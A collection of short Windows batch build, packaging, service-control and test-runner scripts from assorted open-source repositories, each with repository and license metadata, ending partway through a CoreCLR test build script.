@rem found in the LICENSE file.
python %~dp0\perf_to_tracing_json.py %*
| google/fplutil | perf/tools/telemetry/telemetry/core/platform/profiler/perf_vis/perf_to_tracing_json.cmd | bat | apache-2.0 | 215 |
@echo off
%FAKE% %NYX% "target=clean" -st
%FAKE% %NYX% "target=RestoreNugetPackages" -st
IF NOT [%1]==[] (set RELEASE_NUGETKEY="%1")
SET SUMMARY="C-3PO"
SET DESCRIPTION="C-3PO"
%FAKE% %NYX% appName=c-3po.cli appSummary=%SUMMARY% appDescription=%DESCRIPTION% nugetkey=%RELEASE_NUGETKEY% nugetPackageName=C-3PO.Cli
| Elders/c3po | build-configuration.cmd | bat | apache-2.0 | 317 |
@setlocal
@set node_name=harvester
@rem Get the abolute path to the parent directory,
@rem which is assumed to be the node root.
@for /F "delims=" %%I in ("%~dp0..") do @set node_root=%%~fI
@set releases_dir=%node_root%\releases
@rem Parse ERTS version and release version from start_erl.data
@for /F "tokens=1,2" %%I in (%releases_dir%\start_erl.data) do @(
@call :set_trim erts_version %%I
@call :set_trim release_version %%J
)
@set erts_bin=%node_root%\erts-%erts_version%\bin
@set service_name=%node_name%_%release_version%
@if "%1"=="install" @goto install
@if "%1"=="uninstall" @goto uninstall
@if "%1"=="start" @goto start
@if "%1"=="stop" @goto stop
@if "%1"=="restart" @call :stop && @goto start
@if "%1"=="console" @goto console
@rem TODO: attach, ping, restart and reboot
:usage
@echo Usage: %0 {install|uninstall|start|stop|restart|console}
@goto :EOF
:install
@%erts_bin%\erlsrv.exe add %service_name% -c "Erlang node %node_name% in %node_root%" -sname %node_name% -w %node_root% -m %node_root%\bin\start_erl.cmd -args " ++ %node_name% ++ %node_root%" -stopaction "init:stop()."
@goto :EOF
:uninstall
@%erts_bin%\erlsrv.exe remove %service_name%
@%erts_bin%\epmd.exe -kill
@goto :EOF
:start
@%erts_bin%\erlsrv.exe start %service_name%
@goto :EOF
:stop
@%erts_bin%\erlsrv.exe stop %service_name%
@goto :EOF
:console
@start %erts_bin%\werl.exe -boot %releases_dir%\%release_version%\%node_name%
@goto :EOF
:set_trim
@set %1=%2
@goto :EOF
| zincwombat/harvester | rel/files/harvester.cmd | bat | apache-2.0 | 1,471 |
@echo off
set nuget_packages=packages
set paket_packages=packages
set nuget_path=NuGet.CommandLine/tools/NuGet.exe
set fake_path=FAKE/tools/FAKE.exe
set fake=%paket_packages%/%fake_path%
echo restoring with paket
.paket\paket.bootstrapper.exe
.paket\paket.exe restore
echo starting fake for bootstrap.
"%fake%" "Build" --fsiargs -d:WIN64 bootstrap.fsx
| matthid/Yaaf.AdvancedBuilding | bootstrap.cmd | bat | apache-2.0 | 357 |
set NDIR=%date:~10%%date:~4,2%%date:~7,2%_01
set NSUB=sub
cd %NSUB%
md %NDIR%
move *.txt %NDIR%
"C:\Program Files (x86)\7-Zip\7z.exe" a -t7z %NDIR%.7z %NDIR% -mx9 -mmt
rd /S /Q %NDIR% | diblos/diblos.scripts | scripts/test.bat | bat | apache-2.0 | 183 |
call mvn.bat compile exec:java -P run-single -D"exec.args"="%*" -X
| RabbitStewDio/ivy-project-converter | run.bat | bat | apache-2.0 | 67 |
@echo off
echo Please enter version number
set /p delBuild=v
echo Creating Legend-Of-Drongo v%delBuild%.zip
C:
cd "C:\Program Files\7-Zip"
if not exist .\Legend-Of-Drongo MKDIR .\Legend-Of-Drongo
if not exist .\Legend-Of-Drongo\Music MKDIR .\Legend-Of-Drongo\Music
if not exist .\Legend-Of-Drongo\Saves MKDIR .\Legend-Of-Drongo\Saves
if not exist .\Legend-Of-Drongo\Worlds MKDIR .\Legend-Of-Drongo\Worlds
if not exist .\Legend-Of-Drongo\"System Files" MKDIR .\Legend-Of-Drongo\"System Files"
::
::Files
COPY "D:\Google Drive\Programming\Legend-Of-Drongo\README.txt" .\Legend-Of-Drongo
COPY "D:\Google Drive\Programming\Legend-Of-Drongo\LICENSE.md" .\Legend-Of-Drongo
COPY "D:\Google Drive\Programming\Legend-Of-Drongo\Compiled\Legend Of Drongo.exe" .\Legend-Of-Drongo
COPY "D:\Google Drive\Programming\Legend-Of-Drongo\Compiled\Legend Of Drongo World Designer.exe" .\Legend-Of-Drongo
COPY "D:\Google Drive\Programming\Legend-Of-Drongo\Compiled\Legend Of Drongo Data Types.dll" .\Legend-Of-Drongo
COPY "D:\Google Drive\Programming\Legend-Of-Drongo\Compiled\Help.txt" .\Legend-Of-Drongo
COPY "D:\Google Drive\Programming\Legend-Of-Drongo\Compiled\Options.txt" .\Legend-Of-Drongo
::
::Folders
XCOPY "D:\Google Drive\Programming\Legend-Of-Drongo\Compiled\Music" .\Legend-Of-Drongo\Music /E /i
XCOPY "D:\Google Drive\Programming\Legend-Of-Drongo\Compiled\Saves" .\Legend-Of-Drongo\Saves /E /i
XCOPY "D:\Google Drive\Programming\Legend-Of-Drongo\Compiled\Worlds" .\Legend-Of-Drongo\Worlds /E /i
XCOPY "D:\Google Drive\Programming\Legend-Of-Drongo\Compiled\System Files" .\Legend-Of-Drongo\"System Files" /E /i
::
::Zip up and Move
7z.exe a -tzip "Legend-Of-Drongo v%delBuild%.zip" .\Legend-Of-Drongo -r
move ".\Legend-Of-Drongo v%delBuild%.zip" %USERPROFILE%\Desktop
rmdir /s /q .\Legend-Of-Drongo
pause
| joevandebilt/Legend-Of-Drongo | Make/Make Release - 7z.bat | bat | artistic-2.0 | 1,798 |
@echo off
call H:\Programme\OpenOffice\program\python.bat ooextract.py %*
| lsaffre/timtools | timtools/scripts/ooextract.bat | bat | bsd-2-clause | 76 |
@echo off
pushd %~dp0
"%VS120COMNTOOLS%..\IDE\mstest" /test:Microsoft.Protocols.TestSuites.MS_OXCNOTIF.S02_SubscribeAndReceiveNotifications.MSOXCNOTIF_S02_TC01_VerifyTableRowAddEventAndCreateTableViewByTableQueryRows /testcontainer:..\..\MS-OXCNOTIF\TestSuite\bin\Debug\MS-OXCNOTIF_TestSuite.dll /runconfig:..\..\MS-OXCNOTIF\MS-OXCNOTIF.testsettings /unique
pause | XinwLi/Interop-TestSuites-1 | ExchangeMAPI/Source/Scripts/MS-OXCNOTIF/RunMSOXCNOTIF_S02_TC01_VerifyTableRowAddEventAndCreateTableViewByTableQueryRows.cmd | bat | mit | 363 |
mkdir Output
%MOSYNCDIR%\bin\xgcc -g -o Output/main.s -S -O2 -Wno-unused-parameter -I%MOSYNCDIR%/include -I -DMAPIP main.cpp
%MOSYNCDIR%\bin\pipe-tool -elim -s%MOSYNCDIR%/lib/pipe -B Output/program_full Output/main.s MAStd.lib
%MOSYNCDIR%\bin\pipe-tool -B Output/program rebuild.s
REM -entry=crt0_startup_basic
| MoSync/MoSync | testPrograms/bootup/build.bat | bat | gpl-2.0 | 312 |
cmd_arch/arm/mach-rk30/built-in.o := /media/sagformas/47f72a56-be22-485d-ba83-da42e0d4eb18/fuentes/Samsung/TrendPlus/GT-S7580_JB_Opensource/rk-prebuilts/bin/arm-eabi-ld.bfd -EL -r -o arch/arm/mach-rk30/built-in.o arch/arm/mach-rk30/../plat-rk/clock.o arch/arm/mach-rk30/clock_data.o arch/arm/mach-rk30/common.o arch/arm/mach-rk30/ddr.o arch/arm/mach-rk30/devices.o arch/arm/mach-rk30/io.o arch/arm/mach-rk30/iomux.o arch/arm/mach-rk30/pmu.o arch/arm/mach-rk30/reset.o arch/arm/mach-rk30/timer.o arch/arm/mach-rk30/tsadc.o arch/arm/mach-rk30/platsmp.o arch/arm/mach-rk30/headsmp.o arch/arm/mach-rk30/hotplug.o arch/arm/mach-rk30/localtimer.o arch/arm/mach-rk30/pm.o arch/arm/mach-rk30/cpuidle.o arch/arm/mach-rk30/cpufreq.o arch/arm/mach-rk30/dvfs.o arch/arm/mach-rk30/board-rk30-hd1.o arch/arm/mach-rk30/board-rk30-hd1-key.o
| EPDCenter/android_kernel_archos_97_titan | arch/arm/mach-rk30/.built-in.o.cmd | bat | gpl-2.0 | 830 |
@echo off
cd install-soci
R --vanilla --slave -f install-soci.R
cd .. | JanMarvin/rstudio | dependencies/windows/install-soci.cmd | bat | agpl-3.0 | 69 |
call build.cmd
call copy-bin.cmd | chrishaly/RpcLite | src/build-copy-bin.cmd | bat | lgpl-3.0 | 33 |
@echo off
REM *****************************************************************************
REM
REM Pentaho Data Integration
REM
REM Copyright (C) 2006-2019 by Hitachi Vantara : http://www.hitachivantara.com
REM
REM *****************************************************************************
REM
REM Licensed under the Apache License, Version 2.0 (the "License");
REM you may not use this file except in compliance with
REM the License. You may obtain a copy of the License at
REM
REM http://www.apache.org/licenses/LICENSE-2.0
REM
REM Unless required by applicable law or agreed to in writing, software
REM distributed under the License is distributed on an "AS IS" BASIS,
REM WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
REM See the License for the specific language governing permissions and
REM limitations under the License.
REM
REM *****************************************************************************
setlocal
pushd %~dp0
SET OPT=%OPT% "-Dorg.mortbay.util.URI.charset=UTF-8"
SET STARTTITLE="Carte"
SET SPOON_CONSOLE=1
REM ***********************************************************************
REM ** Optionally set up the options for JAAS (uncomment to make active) **
REM ***********************************************************************
REM set OPT=%OPT% -Djava.security.auth.login.config=%JAAS_LOGIN_MODULE_CONFIG%
REM set OPT=%OPT% -Dloginmodulename=%JAAS_LOGIN_MODULE_NAME%
call Spoon.bat -main org.pentaho.di.www.Carte %*
popd
| lgrill-pentaho/pentaho-kettle | assemblies/static/src/main/resources/Carte.bat | bat | apache-2.0 | 1,492 |
flyway clean
| rickding/DBTools | flyway/clean.bat | bat | apache-2.0 | 13 |
del *.class
del *.obj
cd ..
cd javaToC
javac *.java -Xlint:unchecked
cd ..
javah.exe -jni -classpath . javaToC.DirectFourierTransform
copy javaToC_DirectFourierTransform.h native
del javaToC_DirectFourierTransform.h
cd native
cl -c -Ox -I"C:\Program Files\Java\jdk1.7.0_09\include" -I"C:\Program Files\Java\jdk1.7.0_09\include\win32" DirectFourierTransform.c
nvcc -arch=sm_30 cuDirectFourierTransform.cu -c -m64 -I"C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v5.0\include" -I"C:\ProgramData\NVIDIA Corporation\CUDA Samples\v5.0\common\inc"
link /OUT:DirectFourierTransform.dll *.obj /DLL /LIBPATH:"C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v5.0\lib\x64" /LIBPATH:"C:\ProgramData\NVIDIA Corporation\CUDA Samples\v5.0\common\lib" cudart.lib cuda.lib
del "..\DirectFourierTransform.dll"
copy DirectFourierTransform.dll "..\..\..\RamdogPrototype1\"
copy DirectFourierTransform.dll "..\..\" | TheMartinLab/RamDog | C&CUDA/compile_w_CUDA_x64_home.bat | bat | bsd-3-clause | 903 |
@echo off
rem M102 Final
rem Script to make a test replica set. See problem #1.
rem if you need to start over try:
rem rmdir data /s
rem (careful that deletes that everything under data/ recursively!)
rem we expect nothing to be running.
rem you might have a mongo shell running which is ok...but
rem no mongod or mongos processes.
echo make / reset dirs
mkdir C:\data
mkdir C:\data\z1
mkdir C:\data\z2
mkdir C:\data\z3
echo running mongod processes...
start mongod --smallfiles --oplogSize 50 --port 27001 --dbpath C:/data/z1 --replSet z
start mongod --smallfiles --oplogSize 50 --port 27002 --dbpath C:/data/z2 --replSet z
start mongod --smallfiles --oplogSize 50 --port 27003 --dbpath C:/data/z3 --replSet z
rem give them time to start. note this might not be enough time!
sleep 1
echo "Now run:"
echo " mongo --shell --port 27003 a.js"
rem Tip: in powershell, list all mongo processes with:
rem ps mongo*
rem and you can terminate them all with:
rem ps mongo* | kill
| terrinoni/m102 | final_exam/question4/a.bat | bat | mit | 999 |
@ECHO OFF
Tools\NAnt\bin\nant -t:net-2.0 debug
IF %ERRORLEVEL% NEQ 0 PAUSE
| elnomade/hathi | Source/debug net 2.0.bat | bat | gpl-2.0 | 78 |
cmd_sound/soc/built-in.o := arm-eabi-ld -EL -r -o sound/soc/built-in.o sound/soc/snd-soc-core.o sound/soc/codecs/built-in.o sound/soc/atmel/built-in.o sound/soc/au1x/built-in.o sound/soc/blackfin/built-in.o sound/soc/davinci/built-in.o sound/soc/ep93xx/built-in.o sound/soc/fsl/built-in.o sound/soc/imx/built-in.o sound/soc/jz4740/built-in.o sound/soc/mid-x86/built-in.o sound/soc/nuc900/built-in.o sound/soc/omap/built-in.o sound/soc/kirkwood/built-in.o sound/soc/pxa/built-in.o sound/soc/samsung/built-in.o sound/soc/s6000/built-in.o sound/soc/sh/built-in.o sound/soc/tegra/built-in.o sound/soc/txx9/built-in.o sound/soc/msm_1x/built-in.o
| R-M-S/RMS_DragunKernel_V.11-MAX-9-3-2012_3.0.42 | sound/soc/.built-in.o.cmd | bat | gpl-2.0 | 646 |
@echo off
setlocal
REM Set intermediate env vars because the %VAR:x=y% notation below
REM (which replaces the string x with the string y in VAR)
REM doesn't handle undefined environment variables. This way
REM we're always dealing with defined variables in those tests.
set CHK_HOME=_%EC2_HOME%
if "%CHK_HOME:"=%" == "_" goto HOME_MISSING
"%EC2_HOME:"=%\bin\ec2-cmd" DeleteKeyPair %*
goto DONE
:HOME_MISSING
echo EC2_HOME is not set
exit /b 1
:DONE
| barnyard/pi | p2p-api/etc/ec2-api-tools-1.3-30349/bin/ec2delkey.cmd | bat | apache-2.0 | 473 |
@echo off
REM PHP_CodeSniffer tokenises PHP code and detects violations of a
REM defined set of coding standards.
REM
REM PHP version 5
REM
REM @category PHP
REM @package PHP_CodeSniffer
REM @author Greg Sherwood <[email protected]>
REM @author Marc McIntyre <[email protected]>
REM @copyright 2006-2014 Squiz Pty Ltd (ABN 77 084 670 600)
REM @license https://github.com/squizlabs/PHP_CodeSniffer/blob/master/licence.txt BSD Licence
REM @link http://pear.php.net/package/PHP_CodeSniffer
"@php_bin@" -d auto_append_file="" -d auto_prepend_file="" -d include_path="'@php_dir@'" -f "@bin_dir@\phpcs" -- %*
| hunyoboy/respository_list | vendor/squizlabs/php_codesniffer/scripts/phpcs.bat | bat | bsd-3-clause | 626 |
# ********************************************************
# This tests the enable command.
# ********************************************************
set debuggertesting on
set callstyle last
set autoeval off
break Object.gcd
# Should have a breakpoint 1
enable br 1
# Get help on enable
help enable
# Get help on just enable break
help enable break
# Plain enable should work
enable
# An invalid enable command
enable foo
quit
| wearelung/portoalegrecc | vendor/cache/ruby/1.8/gems/ruby-debug-0.10.4/test/data/enable.cmd | bat | mit | 431 |
@echo off
rem
rem "Main"
rem
if not "%1"=="" (
if not "%1"=="-library" (
call :PrintUsage
goto EOF
)
)
rem only ask to accept the license text once
if exist .licenseAccepted goto HandleArgs
rem determine if free or commercial package
set edition=commercial
if exist LICENSE.LGPL. set edition=free
if %edition%==free (
call :HandleFree
) else (
call :RegionLoop
call :Comm
)
echo .
if not exist .licenseAccepted (
echo You are not licensed to use this software.
goto EOF
)
:HandleArgs
if exist config.pri. del config.pri
if "%1"=="-library" (
echo Configuring to build this component as a dynamic library.
echo SOLUTIONS_LIBRARY = yes > config.pri
)
echo .
echo This component is now configured.
echo .
echo To build the component library (if requested) and example(s),
echo run qmake and your make or nmake command.
echo .
echo To remove or reconfigure, run make (nmake) distclean.
echo .
goto EOF
rem
rem "License acceptance loops"
rem
:RegionLoop
echo .
echo Please choose your region.
echo .
echo Type 1 for North or South America.
echo Type 2 for anywhere outside North and South America.
echo .
set /p region=Select:
if %region%==1 (
set licenseFile=LICENSE.US
goto EOF
)
if %region%==2 (
set licenseFile=LICENSE.NO
goto EOF
)
goto RegionLoop
:HandleFree
echo .
echo You are licensed to use this software under the terms of
echo the GNU General Public License (GPL) version 3, or
echo the GNU Lesser General Public License (LGPL) version 2.1
echo with certain additional extra rights as specified in the
echo Nokia Qt LGPL Exception version 1.1.
echo .
echo Type 'G' to view the GNU General Public License (GPL) version 3
echo Type 'L' to view the GNU Lesser General Public License (LGPL) version 2.1
echo Type 'E' to view the Nokia Qt LGPL Exception version 1.1.
echo Type 'yes' to accept this license offer.
echo Type 'no' to decline this license offer.
echo .
set /p answer=Do you accept the terms of this license?
if %answer%==no goto EOF
if %answer%==yes (
echo license accepted > .licenseAccepted
goto EOF
)
if %answer%==g more LICENSE.GPL3
if %answer%==G more LICENSE.GPL3
if %answer%==l more LICENSE.LGPL
if %answer%==L more LICENSE.LGPL
if %answer%==e more LGPL_EXCEPTION.txt
if %answer%==E more LGPL_EXCEPTION.txt
goto HandleFree
:Comm
echo .
echo License Agreement
echo .
echo Type '?' to view the Qt Solutions Commercial License.
echo Type 'yes' to accept this license offer.
echo Type 'no' to decline this license offer.
echo .
set /p answer=Do you accept the terms of this license?
if %answer%==no goto EOF
if %answer%==yes (
echo license accepted > .licenseAccepted
copy %licenseFile% LICENSE
del LICENSE.US
del LICENSE.NO
goto EOF
)
if %answer%==? more %licenseFile%
goto Comm
:PrintUsage
echo Usage: configure.bat [-library]
echo .
echo -library: Build the component as a dynamic library (DLL). Default is to
echo include the component source directly in the application.
echo A DLL may be preferable for technical or licensing (LGPL) reasons.
echo .
goto EOF
:EOF
| cnr-isti-vclab/meshlab | unsupported/plugins_unsupported/external/qtsoap-2.7_1/configure.bat | bat | gpl-3.0 | 3,282 |
@echo off
setlocal
setlocal ENABLEDELAYEDEXPANSION
set AYAC_PATH=..\..\..\pdk\ayac
set AYAC_OPTS=
if "%1" == "clean" goto :CLEAN
rem ±Ìob`t@CÌ étH_¼ðæ¾
set AYAC_INC_PATH=-I"%~dp0%AYAC_PATH%"
rem echo AYAC_INC_PATH = %AYAC_INC_PATH%
for /r %%s in (*.aya) do (
set src_path=%%s
set dst_path=%%~dpns.exa
call :COMPARE !src_path! !dst_path!
if errorlevel 1 (
echo;
echo [DIR] %%~dps
echo [FILE] %%~nxs
call :COMPILE %%s
if errorlevel 1 goto :EOF
) else (
rem echo ... skip
)
)
rem svÈe|t@Cðí
del /s /q *.$$$ 2> NUL
goto :EOF
:COMPARE
if not exist %2 exit /b 1
for %%x in (%1) do set src_t=%%~tx
for %%x in (%2) do set dst_t=%%~tx
rem echo %src_t% %dst_t%
rem \[XXVú>=IuWFNgXVúÌÆ«1
if "%src_t%" GEQ "%dst_t%" exit /b 1
exit /b 0
:COMPILE
%AYAC_PATH%\ayac.exe %AYAC_INC_PATH% %AYAC_OPTS% %1
exit /b
:CLEAN
del /q src\*.exa
del /q src\core\*.exa
del /q src\core\lib\ini\*.exa
del /q src\core\lib\mxcl\*.exa
del /q src\core\lib\xml\*.exa
| n13i/manaka | build.bat | bat | mit | 1,020 |
@echo off
del ~.txt /q /f >nul 2>nul
dxdiag /t ~
w32tm /stripchart /computer:localhost /period:1 /dataonly /samples:3 >nul 2>&1
setlocal enableDelayedExpansion
set currmon=1
for /f "tokens=2 delims=:" %%a in ('find "Current Mode:" ~.txt') do (
echo Monitor !currmon! : %%a
set /a currmon=currmon+1
)
endlocal
del ~.txt /q /f >nul 2>nul
| venkateswaran-s/batch.scripts | system/monitorInfo.bat | bat | mit | 343 |
@echo off
setlocal
set /a local_math=%*
if %ERRORLEVEL%==0 echo %local_math%
| kunst1080/BatLibrary | bin/expr.bat | bat | mit | 81 |
@echo Build SyncMLDotNet in default directories
msbuild SetupOutlookSyncMLAddin2\SetupOutlookSyncMLAddin2.vdproj /target:rebuild /p:configuration=release /p:Platform="Any CPU" /p:WarningLevel=3 /p:OutDir=%~dp0Release\ | zijianhuang/SyncMLDotNet | Products/ReleaseBuildOutlookSyncMLSetup.bat | bat | mit | 218 |
-intstyle "ise" -incremental -o "C:/Users/Ben/Desktop/Folders/Projects/Personal/Senior Project/FPGA Stuff/OZ3_Mandelbrot/OZ3_Sys_Top_TB_isim_beh.exe" -prj "C:/Users/Ben/Desktop/Folders/Projects/Personal/Senior Project/FPGA Stuff/OZ3_Mandelbrot/OZ3_Sys_Top_TB_beh.prj" "work.OZ3_Sys_Top_TB"
| boztalay/HighSchoolSeniorProject | FPGA Stuff/OZ3_Mandelbrot/fuseRelaunch.cmd | bat | mit | 292 |
@if not defined __echo @echo off
setlocal EnableDelayedExpansion
:: Set the default arguments for build
set __BuildArch=x64
set __BuildType=Debug
set __BuildOS=Windows_NT
:: Default to highest Visual Studio version available
set __VSVersion=vs2015
if defined VS120COMNTOOLS set __VSVersion=vs2013
if defined VS140COMNTOOLS set __VSVersion=vs2015
:: Define a prefix for most output progress messages that come from this script. That makes
:: it easier to see where these are coming from. Note that there is a trailing space here.
set __MsgPrefix=BUILDTEST:
set "__ProjectDir=%~dp0..\"
:: remove trailing slash
if %__ProjectDir:~-1%==\ set "__ProjectDir=%__ProjectDir:~0,-1%"
set "__TestDir=%__ProjectDir%\tests"
set "__ProjectFilesDir=%__TestDir%"
set "__SourceDir=%__ProjectDir%\src"
set "__PackagesDir=%__ProjectDir%\packages"
set "__RootBinDir=%__ProjectDir%\bin"
set "__LogsDir=%__RootBinDir%\Logs"
set __CleanBuild=
set __crossgen=
set __ILAsmRoundtrip=
set __BuildSequential=
set __TestPriority=
set __LongGCTests=
set __GCSimulatorTests=
set __msbuildCleanBuildArgs=
set __msbuildExtraArgs=
set __verbosity=normal
set __GCStressLevel=0
:Arg_Loop
if "%1" == "" goto ArgsDone
if /i "%1" == "/?" goto Usage
if /i "%1" == "-?" goto Usage
if /i "%1" == "/h" goto Usage
if /i "%1" == "-h" goto Usage
if /i "%1" == "/help" goto Usage
if /i "%1" == "-help" goto Usage
if /i "%1" == "x64" (set __BuildArch=x64&shift&goto Arg_Loop)
if /i "%1" == "x86" (set __BuildArch=x86&shift&goto Arg_Loop)
if /i "%1" == "arm" (set __BuildArch=arm&shift&goto Arg_Loop)
if /i "%1" == "arm64" (set __BuildArch=arm64&shift&goto Arg_Loop)
if /i "%1" == "debug" (set __BuildType=Debug&shift&goto Arg_Loop)
if /i "%1" == "release" (set __BuildType=Release&shift&goto Arg_Loop)
if /i "%1" == "checked" (set __BuildType=Checked&shift&goto Arg_Loop)
if /i "%1" == "clean" (set __CleanBuild=1&shift&goto Arg_Loop)
if /i "%1" == "vs2013" (set __VSVersion=%1&shift&goto Arg_Loop)
if /i "%1" == "vs2015" (set __VSVersion=%1&shift&goto Arg_Loop)
if /i "%1" == "crossgen" (set __crossgen=true&shift&goto Arg_Loop)
if /i "%1" == "ilasmroundtrip" (set __ILAsmRoundtrip=true&shift&goto Arg_Loop)
if /i "%1" == "sequential" (set __BuildSequential=1&shift&goto Arg_Loop)
if /i "%1" == "priority" (set __TestPriority=%2&shift&shift&goto Arg_Loop)
if /i "%1" == "gcstresslevel" (set __GCStressLevel=%2&shift&shift&goto Arg_Loop)
if /i "%1" == "longgctests" (set __LongGCTests=1&shift&goto Arg_Loop)
if /i "%1" == "gcsimulator" (set __GCSimulatorTests=1&shift&goto Arg_Loop)
if /i "%1" == "verbose" (set __verbosity=detailed&shift&goto Arg_Loop)
@REM It was initially /toolset_dir. Not sure why, since it doesn't match the other usage.
if /i "%1" == "/toolset_dir" (set __ToolsetDir=%2&set __PassThroughArgs=%__PassThroughArgs% %2&shift&shift&goto Arg_Loop)
if /i "%1" == "toolset_dir" (set __ToolsetDir=%2&set __PassThroughArgs=%__PassThroughArgs% %2&shift&shift&goto Arg_Loop)
if /i not "%1" == "msbuildargs" goto SkipMsbuildArgs
:: All the rest of the args will be collected and passed directly to msbuild.
:CollectMsbuildArgs
shift
if "%1"=="" goto ArgsDone
set __msbuildExtraArgs=%__msbuildExtraArgs% %1
goto CollectMsbuildArgs
:SkipMsbuildArgs
echo Invalid command-line argument: %1
goto Usage
:ArgsDone
rem arm64 builds currently use private toolset which has not been released yet
REM TODO, remove once the toolset is open.
if /i "%__BuildArch%" == "arm64" call :PrivateToolSet
if %__verbosity%==detailed (
echo Enabling verbose file logging
)
echo %__MsgPrefix%Commencing CoreCLR repo test build
set "__BinDir=%__RootBinDir%\Product\%__BuildOS%.%__BuildArch%.%__BuildType%"
set "__TestRootDir=%__RootBinDir%\tests"
set "__TestBinDir=%__TestRootDir%\%__BuildOS%.%__BuildArch%.%__BuildType%"
:: We have different managed and native intermediate dirs because the managed bits will include
:: the configuration information deeper in the intermediates path.
:: These variables are used by the msbuild project files.
if not defined __TestIntermediateDir (
set "__TestIntermediateDir=tests\obj\%__BuildOS%.%__BuildArch%.%__BuildType%"
)
set "__NativeTestIntermediatesDir=%__RootBinDir%\%__TestIntermediateDir%\Native"
set "__ManagedTestIntermediatesDir=%__RootBinDir%\%__TestIntermediateDir%\Managed"
:: Generate path to be set for CMAKE_INSTALL_PREFIX to contain forward slash
set "__CMakeBinDir=%__TestBinDir%"
set "__CMakeBinDir=%__CMakeBinDir:\=/%"
:: Configure environment if we are doing a clean build.
if not defined __CleanBuild goto SkipCleanBuild
echo %__MsgPrefix%Doing a clean test build
:: MSBuild projects would need a rebuild
set __msbuildCleanBuildArgs=/t:rebuild
:: Cleanup the binaries drop folder for the current configuration
if exist "%__TestBinDir%" rd /s /q "%__TestBinDir%"
if exist "%__NativeTestIntermediatesDir%" rd /s /q "%__NativeTestIntermediatesDir%"
:SkipCleanBuild
if not exist "%__TestBinDir%" md "%__TestBinDir%"
if not exist "%__NativeTestIntermediatesDir%" md "%__NativeTestIntermediatesDir%"
if not exist "%__ManagedTestIntermediatesDir%" md "%__ManagedTestIntermediatesDir%"
if not exist "%__LogsDir%" md "%__LogsDir%"
echo %__MsgPrefix%Checking prerequisites
:: Eval the output from probe-win1.ps1
for /f "delims=" %%a in ('powershell -NoProfile -ExecutionPolicy RemoteSigned "& ""%__SourceDir%\pal\tools\probe-win.ps1"""') do %%a
set __VSProductVersion=
if /i "%__VSVersion%" == "vs2013" set __VSProductVersion=120
if /i "%__VSVersion%" == "vs2015" set __VSProductVersion=140
:: Check presence of VS
if not defined VS%__VSProductVersion%COMNTOOLS goto NoVS
set __VSToolsRoot=!VS%__VSProductVersion%COMNTOOLS!
if %__VSToolsRoot:~-1%==\ set "__VSToolsRoot=%__VSToolsRoot:~0,-1%"
:: Does VS really exist?
if not exist "%__VSToolsRoot%\..\IDE\devenv.exe" goto NoVS
if not exist "%__VSToolsRoot%\..\..\VC\vcvarsall.bat" goto NoVS
if not exist "%__VSToolsRoot%\VsDevCmd.bat" goto NoVS
if /i "%__VSVersion%" =="vs2015" goto MSBuild14
set _msbuildexe="%ProgramFiles(x86)%\MSBuild\12.0\Bin\MSBuild.exe"
if not exist %_msbuildexe% set _msbuildexe="%ProgramFiles%\MSBuild\12.0\Bin\MSBuild.exe"
if not exist %_msbuildexe% set _msbuildexe="%ProgramFiles(x86)%\MSBuild\14.0\Bin\MSBuild.exe"
goto :CheckMSBuild14
:MSBuild14
set _msbuildexe="%ProgramFiles(x86)%\MSBuild\14.0\Bin\MSBuild.exe"
:CheckMSBuild14
if not exist %_msbuildexe% set _msbuildexe="%ProgramFiles%\MSBuild\14.0\Bin\MSBuild.exe"
if not exist %_msbuildexe% echo Error: Could not find MSBuild.exe. Please see https://github.com/dotnet/coreclr/blob/master/Documentation/project-docs/developer-guide.md for build instructions. && exit /b 1
:: Note: We've disabled node reuse because it causes file locking issues.
:: The issue is that we extend the build with our own targets which
:: means that that rebuilding cannot successfully delete the task
:: assembly.
set __msbuildCommonArgs=/nologo /nodeReuse:false %__msbuildExtraArgs%
if not defined __BuildSequential (
set __msbuildCommonArgs=%__msbuildCommonArgs% /maxcpucount
)
REM =========================================================================================
REM ===
REM === Restore Build Tools
REM ===
REM =========================================================================================
call %__ProjectDir%\init-tools.cmd
REM =========================================================================================
REM ===
REM === Native test build section
REM ===
REM =========================================================================================
::Building Native part of Tests
setlocal EnableDelayedExpansion
echo %__MsgPrefix%Commencing build of native test components for %__BuildArch%/%__BuildType%
if defined __ToolsetDir (
echo %__MsgPrefix%ToolsetDir is defined to be :%__ToolsetDir%
goto GenVSSolution :: Private ToolSet is Defined
)
:: Set the environment for the native build
echo %__MsgPrefix%Using environment: "%__VSToolsRoot%\..\..\VC\vcvarsall.bat" %__VCBuildArch%
call "%__VSToolsRoot%\..\..\VC\vcvarsall.bat" x86_amd64
@if defined __echo @echo on
if not defined VSINSTALLDIR (
echo %__MsgPrefix%Error: VSINSTALLDIR variable not defined.
exit /b 1
)
if not exist "%VSINSTALLDIR%DIA SDK" goto NoDIA
:GenVSSolution
echo %__MsgPrefix%Regenerating the Visual Studio solution in %__NativeTestIntermediatesDir%
pushd "%__NativeTestIntermediatesDir%"
call "%__SourceDir%\pal\tools\gen-buildsys-win.bat" "%__ProjectFilesDir%\" %__VSVersion% %__BuildArch%
@if defined __echo @echo on
popd
if not exist "%__NativeTestIntermediatesDir%\install.vcxproj" (
echo %__MsgPrefix%Failed to generate test native component build project!
exit /b 1
)
set __msbuildNativeArgs=%__msbuildCleanBuildArgs% /p:Configuration=%__BuildType%
if defined __ToolsetDir (
set __msbuildNativeArgs=%__msbuildNativeArgs% /p:UseEnv=true
) else (
set __msbuildNativeArgs=%__msbuildNativeArgs% /p:Platform=%__BuildArch%
)
set __BuildLogRootName=Tests_Native
call :msbuild "%__NativeTestIntermediatesDir%\install.vcxproj" %__msbuildNativeArgs%
if errorlevel 1 exit /b 1
REM endlocal to rid us of environment changes from vcvarsall.bat
endlocal
REM =========================================================================================
REM ===
REM === Managed test build section
REM ===
REM =========================================================================================
REM setlocal to prepare for vsdevcmd.bat
setlocal EnableDelayedExpansion
echo %__MsgPrefix%Starting the Managed Tests Build
:: Set the environment for the managed build
echo %__MsgPrefix%Using environment: "%__VSToolsRoot%\VsDevCmd.bat"
call "%__VSToolsRoot%\VsDevCmd.bat"
if not defined VSINSTALLDIR (
echo %__MsgPrefix%Error: buildtest.cmd should be run from a Visual Studio Command Prompt. Please see https://github.com/dotnet/coreclr/blob/master/Documentation/project-docs/developer-guide.md for build instructions.
exit /b 1
)
set __msbuildManagedBuildArgs=%__msbuildCleanBuildArgs%
if defined __crossgen (
echo Building tests with CrossGen enabled.
